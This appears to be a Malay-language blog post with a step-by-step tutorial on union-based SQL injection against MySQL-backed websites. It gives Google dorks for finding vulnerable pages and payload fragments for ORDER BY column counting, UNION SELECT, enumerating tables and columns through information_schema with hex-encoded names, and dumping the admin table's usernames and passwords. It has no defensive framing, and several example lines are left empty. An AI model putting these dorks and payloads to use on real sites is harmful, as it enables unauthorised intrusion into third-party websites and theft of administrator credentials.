Kata kunci yang perlu diketahui
------------------------------
-
karakter : ', -
comments : /*, --
------------------------------
-
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x ke atas
Google Dork yang akan di gunakan ialah -->
"inurl:news.php?id="
"inurl:index.php?id="
"inurl:trainers.php?id="
"inurl:buy.php?category="
"news-article.php?id="
"inurl:article.php?ID="
-------------------------Langkah Pertama-------------------------
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.
contoh inject code :-
atau
Contoh pesan error :-
warning: mysql_fetch_array:)( supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
-------------------------Langkah Kedua-------------------------
Cari jumlah table yang ada di dalam database.
tambahkan : +order+by+1-- diakhir url
Contoh:
Code:
atau
www.target.com/news.php?id=1+order+by+1/* periksa secara bepringkat
www.target.com/news.php?id=1+order+by+3/*cari sehingga error keluar
Untuk tutorial ini jumlah table yg diperolehi ialah 3.
-------------------------Langkah Ketiga-------------------------
Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
perintah yang akan digunakan : +union+select+1,2,3-- diakhir url
Contoh
Contoh: angka 2 keluar.
kemudian kita masukkan version() di angka (2),
contoh:
dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log
------
|info|
------
version() = untuk lihat version msql yang digunakan
database() = untuk lihat name database yang digunakan
-------------------------Langkah Keempat-------------------------
untuk nampakkan nama2 table yang ada di web tersebut, perintah
table_name letak di angka yang keluar tadi --> (2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.
contoh:
atau kita tambah perintah karekter - di depan angka pertama
-------------------------Langkah Kelima-------------------------
Keluarkan kesemua isi yang ada di dalam table tersebut,
group_concat(table_name) ---> letak di angka yang keluar tadi (2)
+from+information_schema.tables+where+table_schema=database()-- ---> Masukan selepas angka yang terakhir.
Contoh:
information_schema.tables+where+table_schema=database()--
-------------------------Langkah Enam-------------------------
Keluar kan kandungan yang ada didalam TABLE
group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin--
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)
------
|info|
------
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E
Contoh:
information_schema.columns+where+table_name=0x41444D494E--
-------------------------Langkah Ketujuh-------------------------
Keluarkan hasil isi yang kita berjaya peroleh dari table Admin
concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column
Contoh:
Dan kita akan peroleh username dan password admin untuk website tersebut.
-------------------------Langkah Terakhir-------------------------
0 comments:
Post a Comment